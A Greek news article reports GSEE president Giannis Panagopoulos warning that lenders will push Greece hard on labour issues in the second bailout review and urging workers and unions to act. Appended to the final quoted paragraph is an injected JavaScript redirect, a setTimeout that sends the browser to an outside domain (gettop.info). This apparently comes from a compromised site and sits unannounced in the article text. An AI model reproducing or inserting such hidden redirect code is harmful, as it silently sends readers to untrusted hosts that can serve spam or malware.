Παναγόπουλος: Οι εργαζόμενοι οφείλουν να αναλάβουν δράση

0
4

 

Tην εκτίμηση ότι οι δανειστές της χώρας «θα τη φτάσουν στα άκρα» στη δεύτερη αξιολόγηση έκανε, απαντώντας σε ερωτήσεις δημοσιογράφων ο πρόεδρος της ΓΣΕΕ.

Ο Γιάννης Παναγόπουλος υπογράμμισε ότι οι εργαζόμενοι οφείλουν να αναλάβουν δράση για να αποτρέψουν δυσάρεστες επιπτώσεις στους ίδιους και απέναντι σε τέτοιες πρακτικές στην Ελλάδα και στην Ευρώπη.

«Σε όλο το κοινωνικό, πολιτικό και οικονομικό επίπεδο τα πράγματα είναι δυσοίωνα. Η σημερινή δήλωση του προέδρου του Eurogroup ότι «η πίεση επιστρέφει στην Ελλάδα» δείχνει ότι οι δανειστές, τη δεύτερη αξιολόγηση θα τη φτάσουν στα άκρα και ξέρετε ότι το κεντρικό, το κομβικό ζήτημα της δεύτερης αξιολόγησης είναι τα εργασιακά».

«Η απελευθέρωση των ομαδικών απολύσεων, το λοκ άουτ, η αλλαγή του απεργιακού νόμου και όχι του συνδικαλιστικού, όπως θέλουν να λένε, και βέβαια το ζήτημα των συλλογικών διαπραγματεύσεων βρίσκεται στη βαθιά κατάψυξη, σαν αποτέλεσμα του δεύτερου μνημονίου και επανέρχεται με το τρίτο μνημόνιο με την ίδια οξύτητα, μιας και απαγορεύεται να επανέλθουμε στο πρότερο καθεστώς».

«Οφείλουμε να αναλάβουμε δράση – και τα συνδικάτα αναλαμβάνουν και σε εθνικό και σε ευρωπαϊκό επίπεδο, για να μπορέσουμε να την αποτρέψουμε. Αλλά, βεβαίως, όπως αντιλαμβάνεστε, τον λόγο τον έχει η κυβέρνηση.

Η κυβέρνηση διαπραγματεύεται με τους δανειστές, εμείς ασκούμε πιέσεις, ασκούμε με τα ευρωπαϊκά συνδικάτα πιέσεις, γιατί κι αυτοί γνωρίζουν -οι Ευρωπαίοι εργαζόμενοι- ότι εάν κυριαρχήσουν αυτές οι πρακτικές στην Ελλάδα, θα γενικευτούν σε όλη την Ευρώπη κι αυτό θα είναι μια μεγάλη καταστροφή», σημείωσε ο πρόεδρος της ΓΣΕΕ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here